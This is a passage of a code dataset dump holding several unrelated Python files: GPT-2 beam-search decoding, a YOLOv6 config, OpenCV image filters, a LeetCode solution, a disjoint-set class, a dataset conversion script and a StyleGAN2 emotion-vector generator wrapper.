I'm not sure if I'm going to play it or not.\n#I'm not sure if I'm going\n\n for i in range(self.max_ans_length):\n \n ## shape (dim, batch) or (dim, _batch_beam)\n _p_embed = self.Session.Norm(_p_embed, 0)\n\n _p_embed = self.Session.DotAndAdd(_p_embed, self.Models['gpt_model'].NdOutputNormScale, self.Models['gpt_model'].NdOutputNormBias)\n\n _logit = self.Session.MatMul(_p_embed, 0, self.Models['gpt_model'].NdTokenEmbed, 1)\n _prob = self.Session.Softmax(_logit)\n _logp = self.Session.Act(_prob, A_Func.Log)\n\n # for beam search:\n if i > 0:\n _logp = self.Session.Reshape(_logp, _vocab, _beam, _batch)\n _logp = self.Session.Add(_logp, self.beam_scores[i - 1]).Reshape(_vocab_beam, _batch) \n\n _topK_w = self.Session.ArgmaxKV3(_logp, beam_size)\n self.beam_scores.append(_topK_w.Item1.Reshape(_default, _beam, _batch))\n\n _chosen_beam = self.Session.DivMod(_topK_w.Item3, self.Models['vocab'])\n \n _beam_idx = _chosen_beam.Item1 \n _tokens = _chosen_beam.Item2\n\n self.beam_tokens.append(_tokens)\n self.beam_idxes.append(_beam_idx)\n\n if i == self.max_ans_length - 1:\n break\n\n # for beam search:\n\n _beam_batch_idx = self.Session.Add(_beam_idx, _beam_offset, self.batch_size * self.beam_size) # CudaPieceInt a, CudaPieceInt b, int size)\n\n for layer in range(self.Models['layer']):\n self.Session.LookupEmbed(cur_buffer_key[layer].Reshape(_mem_dim, _batch_beam), _beam_batch_idx, cache_buffer_key[layer].Reshape(_mem_dim, _batch_beam))\n self.Session.LookupEmbed(cur_buffer_value[layer].Reshape(_mem_dim, _batch_beam), _beam_batch_idx, cache_buffer_value[layer].Reshape(_mem_dim, _batch_beam))\n\n tmp_buf = cur_buffer_value\n cur_buffer_value = cache_buffer_value\n cache_buffer_value = tmp_buf\n\n tmp_buf = cur_buffer_key\n cur_buffer_key = cache_buffer_key\n cache_buffer_key = tmp_buf\n\n\n cur_position = self.Session.Inc(cur_position, 1)\n\n _token_embed = self.Session.LookupEmbed(self.Models['gpt_model'].TokenEmbed, _tokens).Reshape(_dim, _beam, _batch) \n _pos_embed = self.Session.LookupEmbed(self.Models['gpt_model'].PosEmbed, cur_position).Reshape(_dim, _beam, _batch)\n _embed = self.Session.Add(_token_embed, _pos_embed).Reshape(_dim, _batch_beam)\n \n for layer in range(self.Models['layer']):\n #print('cur layer', layer, len(cur_buffer_key), len(cur_buffer_value), len(self.Models['gpt_model'].Blocks))\n _embed = self.Session.SingalGPTTransformer(self.Models['gpt_model'].Blocks[layer], head_att, cur_buffer_key[layer], cur_buffer_value[layer], self.max_seq_length, _embed, cur_position, 0.0)\n _p_embed = _embed\n\n def predict(self, q_tokens, q_len): \n self.Behavior.Setup()\n self.Behavior.SetPredictMode()\n\n for b in range(self.batch_size):\n for q in range(0, q_len[b]):\n self.q_tokens[b * self.max_cond_length + q] = q_tokens[b][q]\n\n for pad in range(0, self.max_cond_length - q_len[b]):\n self.q_tokens[b * self.max_cond_length + q_len[b] + pad] = 50256\n\n self.pred_pos[b] = q_len[b] - 1\n\n for x in range(self.beam_size):\n self.beam_pred_pos[b * self.beam_size + x] = self.pred_pos[b]\n #self.q_last_pos[b] = q_len[b] - 1\n\n self.q_tokens.SyncFromCPU()\n self.pred_pos.SyncFromCPU()\n self.beam_pred_pos.SyncFromCPU()\n\n self.Session.ForwardV3() \n\n self.ans_tok_ids = torch.zeros([self.batch_size, self.max_ans_length], dtype = torch.int32)\n self.ans_tok_len = torch.zeros([self.batch_size], dtype = torch.int32)\n\n\n max_beam = [-100000.0] * self.batch_size\n max_beam_idx = [-1] * self.batch_size\n\n for i in range(self.max_ans_length):\n self.beam_tokens[i].SyncToCPU()\n 
self.beam_scores[i].Output.SyncToCPU()\n self.beam_idxes[i].SyncToCPU()\n\n #self.beam_idxes[i].Print('beam indexes:', self.batch_size * self.beam_size, False)\n\n for p_i in range(self.max_ans_length, 0, -1):\n i = p_i - 1\n for b in range(self.batch_size):\n new_beam = False\n for s in range(self.beam_size):\n idx = b * self.beam_size + s\n bs = self.beam_scores[i].Output[idx]\n\n if((self.beam_tokens[i][idx] == 50256 or p_i == self.max_ans_length) and bs > max_beam[b]):\n max_beam[b] = bs\n max_beam_idx[b] = idx\n \n self.ans_tok_ids[b][i] = self.beam_tokens[i][idx]\n self.ans_tok_len[b] = p_i\n\n new_beam = True\n #print('beam tokens length', len(self.beam_tokens), b, p_i)\n if not new_beam:\n #print('max beam_idx 1', max_beam_idx[b])\n\n max_beam_idx[b] = self.beam_idxes[i + 1][max_beam_idx[b]]\n #print('max beam_idx 2', max_beam_idx[b])\n\n self.ans_tok_ids[b][i] = self.beam_tokens[i][max_beam_idx[b]] \n #print('max token', self.tok_ids[i])\n\n\n return self.ans_tok_ids, self.ans_tok_len\n\n #for b in range(self.batch_size):\n # if(self.tok_len[b] == 0):\n # self.tok_len[b] = self.max_seq_length\n #def backward(self):\n # self.Session.BackwardV3()\n\n\ndef interact_model(\n model_name='117M',\n seed=None,\n nsamples=1,\n batch_size=1,\n length=None,\n temperature=1,\n top_k=0,\n models_dir='/data1/yelongshen/gpt-2/models', \n):\n \"\"\"\n Interactively run the model\n :model_name=117M : String, which model to use\n :seed=None : Integer seed for random number generators, fix seed to reproduce\n results\n :nsamples=1 : Number of samples to return total\n :batch_size=1 : Number of batches (only affects speed/memory). Must divide nsamples.\n :length=None : Number of tokens in generated text, if None (default), is\n determined by model hyperparameters\n :temperature=1 : Float value controlling randomness in boltzmann\n distribution. Lower temperature results in less random completions. As the\n temperature approaches zero, the model will become deterministic and\n repetitive. Higher temperature results in more random completions.\n :top_k=0 : Integer value controlling diversity. 1 means only 1 word is\n considered for each step (token), resulting in deterministic completions,\n while 40 means 40 words are considered at each step. 0 (default) is a\n special setting meaning no restrictions. 40 generally is a good value.\n :models_dir : path to parent folder containing model subfolders\n (i.e. 
contains the folder) \n \"\"\"\n models_dir = os.path.expanduser(os.path.expandvars(models_dir))\n\n enc = encoder.get_encoder(model_name, models_dir)\n \n behavior = DeviceBehavior(0).PredictMode\n\n max_seq = 256\n gpt = gpt_model(model_name, models_dir, behavior)\n\n lm = gpt_gen(enc, gpt.Models, max_seq, 64, 1, behavior)\n\n behavior.Setup()\n behavior.SetPredictMode()\n\n while True:\n raw_text = input(\"Input prompt >>> \")\n \n tokens = enc.encode(raw_text)\n tok_len = len(tokens)\n print(tokens, tok_len)\n\n tokens.extend([ gpt.Models['vocab'] - 1 for _ in range(max_seq - tok_len)])\n \n in_tok = torch.zeros([1, max_seq], dtype=torch.int32)\n in_tok[0] = torch.IntTensor(tokens)\n\n in_tok_len = torch.zeros([1], dtype=torch.int32)\n in_tok_len[0] = tok_len\n \n ans_tok, ans_len = lm.predict(in_tok, in_tok_len)\n \n #_tok = _ans_tokens[b]\n #_len = _ans_len[b]\n #print(_len, _tok[:_len])\n ans_tokens = ans_tok[0][:ans_len[0]].numpy()\n \n print(ans_tokens)\n\n _decode_text = enc.decode(ans_tokens)\n\n print(_decode_text)\n\n #lm.forward(in_tok, in_tok_len)\n #print('lm probability:', lm.loss.Value)\n #print('accuracy 1:', lm.acc[0] / lm.eff_size, 'accuracy 5:', lm.acc[1] / lm.eff_size)\n\n\nif __name__ == '__main__':\n interact_model()\n #fire.Fire(interact_model)\n\n","sub_path":"python/gpt_text_gen/gpt_lm_gen.py","file_name":"gpt_lm_gen.py","file_ext":"py","file_size_in_byte":16249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"103173225","text":"# YOLOv6n model\nmodel = dict(\n type='YOLOv6s6',\n pretrained=None,\n depth_multiple=0.33,\n width_multiple=0.50,\n backbone=dict(\n type='EfficientRep6',\n num_repeats=[1, 6, 12, 18, 6, 6],\n out_channels=[64, 128, 256, 512, 768, 1024],\n fuse_P2=True, # if use RepBiFPANNeck6, please set fuse_P2 to True.\n cspsppf=True,\n ),\n neck=dict(\n type='RepBiFPANNeck6',\n num_repeats=[12, 12, 12, 12, 12, 12],\n out_channels=[512, 256, 128, 256, 512, 1024],\n ),\n head=dict(\n type='EffiDeHead',\n in_channels=[128, 256, 512, 1024],\n num_layers=4,\n anchors=1,\n strides=[8, 16, 32, 64],\n atss_warmup_epoch=4,\n iou_type='giou',\n use_dfl=False,\n reg_max=0 #if use_dfl is False, please set reg_max to 0\n )\n)\n\nsolver = dict(\n optim='SGD',\n lr_scheduler='Cosine',\n lr0=0.01,\n lrf=0.01,\n momentum=0.937,\n weight_decay=0.0005,\n warmup_epochs=3.0,\n warmup_momentum=0.8,\n warmup_bias_lr=0.1\n)\n\ndata_aug = dict(\n hsv_h=0.015,\n hsv_s=0.7,\n hsv_v=0.4,\n degrees=0.0,\n translate=0.1,\n scale=0.5,\n shear=0.0,\n flipud=0.0,\n fliplr=0.5,\n mosaic=1.0,\n mixup=0.0,\n)\n","sub_path":"cv/detection/yolov6/pytorch/configs/yolov6s6.py","file_name":"yolov6s6.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"463206547","text":"import cv2, numpy\n\nclass ImageProcessor:\n def convert_colorspace(self, image, colorspace):\n try:\n image = cv2.cvtColor(image, colorspace)\n except cv2.error as e:\n print('Error throwed while trying to convert colorspace')\n\n return image\n\n def convert_bgr_to_rgb(self, image):\n im = image\n\n try:\n b, g, r = cv2.split(im)\n im = cv2.merge([r, g, b])\n except:\n return 'gray'\n\n image = im\n\n return None\n\n def convolute(self, image, kernel):\n kernel = numpy.asanyarray(kernel, numpy.float32)\n return cv2.filter2D(image, -1, kernel)\n\n def salt_and_pepper(self, image, amount):\n salt_vs_pepper = 0.5\n amount = float(amount) / 1000\n out = image\n\n # Salt mode\n 
num_salt = numpy.ceil(amount * image.size * salt_vs_pepper)\n coords = [numpy.random.randint(0, i - 1, int(num_salt)) for i in image.shape]\n out[coords] = 1\n\n # Pepper mode\n num_pepper = numpy.ceil(amount * image.size * (1.0 - salt_vs_pepper))\n coords = [numpy.random.randint(0, i - 1, int(num_pepper)) for i in image.shape]\n out[coords] = 0\n\n return out\n\n def high_pass(self, image, kernel_size=5):\n middle = numpy.ceil((kernel_size - 1) / 2)\n\n kernel = numpy.full((kernel_size, kernel_size), -1)\n kernel[middle][middle] = (kernel_size ** 2) - 1\n\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n return self.convolute(image, kernel)\n\n # Low pass filter using average, also known as image blurring\n def average(self, image, kernel_size=5):\n return cv2.blur(image, (kernel_size, kernel_size))\n\n def median(self, image, kernel_size=5):\n return cv2.medianBlur(image, kernel_size)\n\n # Thresholding sets pixel value to predefined value if its greater than a threshold else it is assigned to another value\n # Adaptive thresholding was used with gaussian weights\n def binarization(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n return cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\n # Sobel edge detection using, respectively, x and y order\n def sobel(self, image, ddepth = cv2.CV_64F, scale = 1, delta = 0):\n image = cv2.GaussianBlur(image, (5,5), 0)\n gray = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n # Gradient-X\n grad_x = cv2.Sobel(gray, ddepth, 1, 0, ksize = 5, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n # Gradient-Y\n grad_y = cv2.Sobel(gray, ddepth, 0, 1, ksize = 5, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n\n abs_grad_x = cv2.convertScaleAbs(grad_x) # converting back to uint8\n abs_grad_y = cv2.convertScaleAbs(grad_y)\n\n return cv2.addWeighted(abs_grad_x, 0.5, abs_grad_y, 0.5, 0)\n\n def prewitt(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n kernel_x = [[-1, -1, -1], [0, 0, 0], [1, 1, 1]]\n kernel_y = [[-1, 0, 1], [-1, 0, 1], [-1, 0, 1]]\n\n prewitt_x = self.convolute(image, kernel_x)\n prewitt_y = self.convolute(image, kernel_y)\n\n return cv2.addWeighted(prewitt_x, 0.5, prewitt_y, 0.5, 0)\n\n def roberts(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n kernel_x = [[1, 0], [0, -1]]\n kernel_y = [[0, 1], [-1, 0]]\n\n roberts_x = self.convolute(image, kernel_x)\n roberts_y = self.convolute(image, kernel_y)\n\n return cv2.addWeighted(roberts_x, 0.5, roberts_y, 0.5, 0)\n\n # Hough Line Transform for line detection\n def hough_lines(self, image):\n gray = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n edges = cv2.Canny(gray, 50, 150, apertureSize = 3)\n\n lines = cv2.HoughLines(edges, 0.7, numpy.pi/180, 200)\n for rho,theta in lines[0]:\n a = numpy.cos(theta)\n b = numpy.sin(theta)\n x_zero = a * rho\n y_zero = b * rho\n x_one = int(x_zero + 1000 * (-b))\n x_two = int(x_zero - 1000 * (-b))\n y_one = int(y_zero + 1000 * a)\n y_two = int(y_zero - 1000 * a)\n\n cv2.line(image, (x_one, y_one), (x_two, y_two), (0, 0 ,255), 2)\n\n return image\n\n # Hough Circle Transform for circles detection\n def hough_circles(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n image = cv2.GaussianBlur(image, (5,5), 0)\n\n cimage = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(image, cv2.cv.CV_HOUGH_GRADIENT, 1, 20, param1=50, param2=30, 
minRadius=0, maxRadius=100)\n circles = numpy.uint16(numpy.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimage, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimage, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n return cimage\n\n def horizontal(self, image):\n kernel = [[-1,-1,-1],[2,2,2],[-1,-1,-1]]\n return self.convolute(image, kernel)\n\n def vertical(self, image):\n kernel = [[-1,2,-1],[-1,2,-1],[-1,2,-1]]\n return self.apply_filter(kernel, image)\n\n def diagonal(self, image, diagonal='Main'):\n if diagonal == 'Main':\n kernel = [[-1,-1,2],[-1,2,-1],[2,-1,-1]]\n elif diagonal == 'Secondary':\n kernel = [[2,-1,-1],[-1,2,-1],[-1,-1,2]]\n\n return self.convolute(image, kernel)\n\n # Color detection/extraction\n def color_detection(self, image, color, r=10):\n hsv = self.convert_colorspace(image, cv2.COLOR_BGR2HSV)\n color = numpy.uint8([[color]])\n color = cv2.cvtColor(color, cv2.COLOR_BGR2HSV)\n\n # define color range\n lower = numpy.array([color[0][0][0] - r, 100, 100])\n upper = numpy.array([color[0][0][0] + r, 255, 255])\n\n # threshold the HSV image to get only desired colors\n mask = cv2.inRange(hsv, lower, upper)\n\n # bitwise AND mask and original image\n return cv2.bitwise_and(image, image, mask=mask)\n\n # Generate the energy map, filterType can be 's' for Sobel, or 'g' for Gabor filter. half_width is the half-size of the filter\n # ex: half_width = 3 means that the final size of the filter will be 3 * 2 + 1 = 7 pixels\n def generate_energy_map(self, image, filterType, half_width):\n if filterType == \"g\":\n kernel = cv2.getGaborKernel((half_width * 2 + 1, half_width * 2 + 1))\n gradient = cv2.filter2D(image, cv2.CV_32F, kernel, 2, 0, 3, 1)\n elif filterType == \"s\":\n gradient = cv2.Sobel(image, cv2.CV_32F, 1, 0, ksize=half_width * 2 + 1)\n\n return numpy.multiply(gradient, gradient)\n\n def seam_carving(self, originalIm, nbColsToRemove, filter = 's'):\n (rows, cols, depth) = originalIm.shape\n\n # half size of the filter used to generate the energy map\n half_filterw = 4\n\n originalImGray = self.convert_colorspace(originalIm, cv2.COLOR_RGB2GRAY);\n\n currentImage = originalIm\n currentImageGray = originalImGray\n\n # remove nbColsToRemove lines\n for iter in range(1, nbColsToRemove):\n # Generate the energy map\n energyMap = self.generate_energy_map(currentImageGray, filter, half_filterw)\n\n # borders removal\n energyMap = energyMap[:, half_filterw : -half_filterw]\n\n # Creation of the weight map\n costs = numpy.zeros_like(energyMap)\n\n # Initialize first line\n costs[0, :] = energyMap[0, :]\n\n # Propagate the best solution\n for i in range(1, rows):\n # min f(i, j) = gradient(i, j) + min ( f(i-1, j-1), f(i-1, j), f(i-1, j +1 ) )\n opt = numpy.minimum( costs[i-1, :-2], costs[i-1, 1:-1] )\n opt = numpy.minimum( costs[i-1, 2:], opt )\n costs[i, 1:-1] = energyMap[i, 1:-1] + opt\n costs[i, 0] = energyMap[i, 0] + numpy.min(costs[i-1, :2] )\n costs[i, -1] = energyMap[i, -1] + numpy.min(costs[i-1, -2:] )\n\n minPos = numpy.argmin(costs[-1, :])\n\n newColsNumber = energyMap.shape[1] - 1\n\n # Creation of the image matrix where the lowest-energy line has been removed (cut*)\n cutCosts = numpy.zeros( (rows, newColsNumber) )\n\n # The borders of cutImageGray and cutIm are not removed, therefore they are filterwidth * 2 larger\n cutImageGray = numpy.zeros( (rows, newColsNumber + half_filterw * 2), dtype=numpy.float32 )\n cutIm = numpy.zeros( (rows, newColsNumber + half_filterw * 2, depth), dtype=numpy.uint8 )\n\n # 
backtrack from the bottom to the top to select the lowest-energy line\n # minPos is the position of the lowest-energy pixel at the row i that is connected to\n # the lowest-energy path at rows i+1 and beyond\n minPos = 1 + numpy.argmin(costs[rows - 1, 1:-2], axis=0)\n\n for i in range(rows -1, 0, -1):\n # Special cases: at the last row, the path was on the left or right edges\n if minPos == 0:\n minPos = minPos + numpy.argmin( costs[i, 0 : 2] )\n elif minPos == newColsNumber-1:\n minPos = minPos + numpy.argmin( costs[i, -2 : -1] ) - 1\n # General case\n else:\n minPos = minPos + numpy.argmin( costs[i, minPos - 1 : minPos + 2] ) - 1\n # draw the lowest-energy path on the image and on the weight map, used to generate pretty pictures.\n # The pixels that are changed will be removed for the cut* images\n currentImage[i, minPos + half_filterw, :] = 0\n costs[i, minPos] = 0\n\n cutIm[i, :, :] = numpy.delete(currentImage[i, :, :], minPos + half_filterw, axis=0)\n cutCosts[i, :] = numpy.delete(costs[i, :], minPos, axis=0)\n cutImageGray[i, :] = numpy.delete(currentImageGray[i, :], minPos + half_filterw, axis=0)\n\n currentImage = cutIm\n currentImageGray = cutImageGray\n\n return currentImage\n\n def union(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_or(operand1, operand2)\n\n def intersection(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_and(operand1, operand2)\n\n def complement(self, image):\n operand1 = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_not(operand1)\n\n def difference(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.subtract(operand1, operand2)\n","sub_path":"image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307967755","text":"'''Majority Element\r\nGiven an array of size n, find the majority element. 
The majority element is the element that appears more than ⌊ n/2 ⌋ times.\r\n\r\nYou may assume that the array is non-empty and the majority element always exist in the array.\r\n\r\nExample 1:\r\n\r\nInput: [3,2,3]\r\nOutput: 3\r\nExample 2:\r\n\r\nInput: [2,2,1,1,1,2,2]\r\nOutput: 2'''\r\nfrom typing import List\r\nclass Solution:\r\n def majorityElement(self, nums: List[int]) -> int:\r\n majordict = {}\r\n \r\n for val in nums:\r\n majordict[val] = majordict.get(val,0)+1\r\n if majordict[val] > len(nums)/2:\r\n return val","sub_path":"Leetcode/May2020_Problems/May6.py","file_name":"May6.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380754780","text":"class DisjointSet(object):\r\n def __init__(self):\r\n self.data = []\r\n\r\n def make_set(self, obj):\r\n obj['parent'] = obj\r\n obj['rank'] = 0\r\n self.data.insert(0, obj)\r\n\r\n def find(self, obj):\r\n if obj['parent'] != obj:\r\n obj['parent'] = self.find(obj['parent'])\r\n return obj['parent']\r\n\r\n def union(self, obj1, obj2):\r\n set1 = self.find(obj1)\r\n set2 = self.find(obj2)\r\n if set1 == set2:\r\n return\r\n\r\n if set1['rank'] > set2['rank']:\r\n set2['parent'] = set1\r\n else:\r\n set1['parent'] = set2\r\n if set1['rank'] == set2['rank']:\r\n set2['rank'] += 1\r\n\r\n\r\n\r\n# class DisjointSet(object):\r\n# def __init__(self, size):\r\n# if (size <= 0):\r\n# raise Exception('Invalid size.')\r\n# self.size = size\r\n# self.parent = [None] * (size + 1)\r\n# self.rank = [None] * (size + 1)\r\n#\r\n# def make_set(self, obj):\r\n# self.parent[obj] = obj\r\n# self.rank[obj] = 0\r\n#\r\n# def find(self, obj):\r\n# if obj != self.parent[obj]:\r\n# self.parent[obj] = self.find(self.parent[obj])\r\n# return self.parent[obj]\r\n#\r\n# def union(self, obj1, obj2):\r\n# set1 = self.find(obj1)\r\n# set2 = self.find(obj2)\r\n# if set1 == set2:\r\n# return\r\n#\r\n# if self.rank[set1] > self.rank[set2]:\r\n# self.parent[set2] = set1\r\n# else:\r\n# self.parent[set1] = set2\r\n# if self.rank[set1] == self.rank[set2]:\r\n# self.rank[set2] += 1","sub_path":"algs/disjoint_set.py","file_name":"disjoint_set.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101848573","text":"from tqdm import tqdm\nimport pickle\nimport sys\nimport os\nfrom pathlib import Path\n\n\nif len(sys.argv) < 2:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit()\n\ndb = sys.argv[1]\ndir_prefix = \"/home/uji300/OpenKE/benchmarks/\"\nefile = dir_prefix + db + \"/entity2id.txt\"\nrfile = dir_prefix + db + \"/relation2id.txt\"\n\n#entity2id.txt n-1.txt n-n.py n-n.txt relation2id.txt test2id_all.txt test2id.txt train2id.txt type_constrain.txt valid2id.txt\n\ntrain_file = dir_prefix + db + \"/train2id.txt\"\nvalid_file = dir_prefix + db + \"/valid2id.txt\"\ntest_file = dir_prefix + db + \"/test2id.txt\"\n\n\neid_to_fid = {}\nrid_to_rel = {}\nid_to_relation = {}\nid_to_entity = {}\n'''\nidfile = \"/var/scratch2/uji300/kbs/fb15k237-id-to-entity.tsv\"\nfbdict = {}\nwith open(idfile, \"r\") as fin:\n lines = fin.readlines()\n for line in tqdm(lines):\n cols = line.split(maxsplit=1)\n if len(cols) < 2:\n #print(line)\n continue\n key = cols[0]\n val = cols[1]\n fbdict[key] = val\n'''\n\ncnt = 0\nwith open(efile, \"r\")as fin:\n lines = fin.readlines()\n for line in tqdm(lines[1:]):\n fid = line.split()[0].rstrip()\n eid = line.split()[1].rstrip()\n id_to_entity[int(eid)] = 
fid\n\nwith open(rfile, \"r\") as fin:\n lines = fin.readlines()\n for line in tqdm(lines[1:]):\n cols = line.split(maxsplit=1)\n val = cols[0]\n key = cols[1]\n id_to_relation[int(key)] = val.rstrip()\n\ndef expand_file(name):\n for x in [\"train\", \"valid\", \"test\"]:\n if x in name:\n outname = result_dir + x + \".txt\"\n\n newlines = \"\"\n with open(name, \"r\") as fin:\n lines = fin.readlines()\n for line in lines[1:]:\n head = int(line.split()[0])\n tail = int(line.split()[1])\n rel = int(line.split()[2].rstrip())\n this_line = eid_to_fid[head] +\"\\t\"+rid_to_rel[rel]+\"\\t\"+eid_to_fid[tail]+\"\\n\"\n newlines += this_line\n #print(this_line)\n # make a new file with new lines\n with open(outname, \"w\") as fout:\n fout.write(newlines)\n\n#expand_file(train_file)\n#expand_file(valid_file)\n#expand_file(test_file)\nresult_dir='/var/scratch2/uji300/OpenKE-results/' + db + '/misc/' \nPath(result_dir).mkdir(parents=True, exist_ok=True)\n\nwith open(result_dir + db + '-id-to-entity.pkl', 'wb') as fout:\n pickle.dump(id_to_entity, fout, protocol = pickle.HIGHEST_PROTOCOL)\n\nwith open(result_dir + db + '-id-to-relation.pkl', 'wb') as fout:\n pickle.dump(id_to_relation, fout, protocol = pickle.HIGHEST_PROTOCOL)\n","sub_path":"convert_dataset.py","file_name":"convert_dataset.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"243453523","text":"'''\n103 - Ficha do Jogador.\n\nCreated by Renan Souza on 08/01/19.\nCopyright © 2019 All rights reserved.\n'''\n\ndef ficha(n='', g=0):\n\treturn f'O jogador: {n} fez {g} gol(s) no campeonato.'\n\n\n#Exit---------------------------------------------------\nprint('-' * 30)\nnome = str(input('Nome do Jogador: ')).strip().capitalize()\ngols = str(input('Número de Gols: '))\n\nif gols.isnumeric():\n\tgols = int(gols)\nelse:\n\tgols = 0\n\nif nome.strip() == ' ':\n\tprint(ficha(gols))\nelse:\n\tprint(ficha(nome, gols))\n","sub_path":"103.py","file_name":"103.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152214462","text":"import pickle\nfrom pathlib import Path\nfrom typing import List, Tuple, Dict\n\nimport numpy as np\nimport tensorflow as tf\n\nimport dnnlib\nfrom .model import Generator\n\nBASE_DIR = Path.cwd() / '_pickles'\nPICKLED_GEN = BASE_DIR / 'stylegan2-ffhq-config-f.pkl'\nPICKLED_EMOTIONS_VECTORS = BASE_DIR / 'emotion_directions_in_latent_space.pkl'\n\n\nclass GeneratorWrapper:\n batch_size, random_noise, tf_session, Gs, generator, emotion_vectors, vectors \\\n = None, None, None, None, None, None, None\n\n def __init__(self, batch_size: int, random_noise: bool, vectors: Dict[int, Tuple[str, float]]):\n self.batch_size = batch_size\n self.random_noise = random_noise\n # Initialize the tensorflow session\n dnnlib.tflib.init_tf()\n self.tf_session = tf.get_default_session()\n self.vectors = vectors\n self.__start_generator(batch_size, random_noise)\n\n def restart_generator(self, batch_size: int, random_noise: bool):\n self.batch_size = batch_size\n self.random_noise = random_noise\n # Close and reinitialize the tensorflow session\n # self.tf_session.close()\n # dnnlib.tflib.init_tf()\n # self.tf_session = tf.get_default_session()\n self.__start_generator(batch_size, random_noise)\n\n def __start_generator(self, batch_size: int, random_noise: bool):\n with self.tf_session.as_default():\n # Load networks from weights file\n with 
open(PICKLED_GEN, \"rb\") as file:\n _, _, self.Gs = pickle.load(file)\n # Load emotion vectors\n with open(PICKLED_EMOTIONS_VECTORS, \"rb\") as file:\n self.emotion_vectors = pickle.load(file)\n # Initialize the generator\n self.generator = Generator(self.Gs, batch_size, random_noise)\n\n def get_latent_state(self, seed: int, truncation_psi: float = 0.5):\n \"\"\" Given a seed in the [0, 2^31-1] interval, produce a latent state \"\"\"\n random_state = np.random.RandomState(np.asarray(seed))\n latents = random_state.randn(1, self.Gs.input_shape[1])\n with self.tf_session.as_default():\n all_w = self.Gs.components.mapping.run(latents, None)\n average_latent = self.Gs.get_var(\"dlatent_avg\")\n return average_latent + (all_w - average_latent) * truncation_psi\n\n def get_latent_states(self, seeds: List[int], truncation_psi: float = 0.5):\n \"\"\" Given an array of seeds in the [0, 2^31-1] interval, produce an array of latent states \"\"\"\n random_state = np.random.RandomState(np.asarray(seeds[0]))\n latents = random_state.randn(1, self.Gs.input_shape[1])\n for seed in seeds[1:]:\n random_state.seed(seed)\n latent = random_state.randn(1, self.Gs.input_shape[1])\n latents = np.append(latents, latent, axis=0)\n with self.tf_session.as_default():\n all_w = self.Gs.components.mapping.run(latents, None)\n average_latent = self.Gs.get_var(\"dlatent_avg\")\n return average_latent + (all_w - average_latent) * truncation_psi\n\n def apply_vectors_to_latent(self, latent_state, vectors: List[Tuple[int, float]]):\n \"\"\" Apply emotions with provided multipliers \"\"\"\n latent_state = latent_state.reshape((latent_state.shape[0], 18 * 512))\n for (v_id, v_multiplier) in vectors:\n (v_effect, v_weight) = self.vectors[v_id]\n emotion_vector = self.emotion_vectors[f'neutral->{v_effect}']\n weighted_emotion_vector = emotion_vector * v_weight\n scaled_emotion_vector = weighted_emotion_vector * v_multiplier\n latent_state += scaled_emotion_vector\n return latent_state.reshape((latent_state.shape[0], 18, 512))\n\n def generate_from_latent(self, latent_state, add_padding: bool = True):\n \"\"\" Generate image of the provided latent state. 
Given that the latent state\n dimensions to not match batch size - a padding shall be added, and removed afterwards \"\"\"\n assert (latent_state.shape[0] <= self.batch_size and latent_state.shape[1:] == (18, 512))\n diff = self.batch_size - latent_state.shape[0]\n # In case batch size does not match - add padding\n if 0 < diff and add_padding:\n latent_state = np.append(latent_state, np.empty((diff, 18, 512)), axis=0)\n with self.tf_session.as_default():\n self.generator.set_dlatents(latent_state)\n img_array = self.generator.generate_images()\n self.generator.reset_dlatents()\n # In case a padding was added - remove random images\n if 0 < diff and add_padding:\n img_array = img_array[:latent_state.shape[0] - diff]\n return img_array\n\n def generate(self, seed: int, vectors: List[Tuple[int, float]] = None):\n \"\"\" Generation pipeline, make latent state from a seed, apply emotion vectors, and generate an image \"\"\"\n ls = self.get_latent_state(seed)\n if vectors:\n self.apply_vectors_to_latent(ls, vectors)\n return 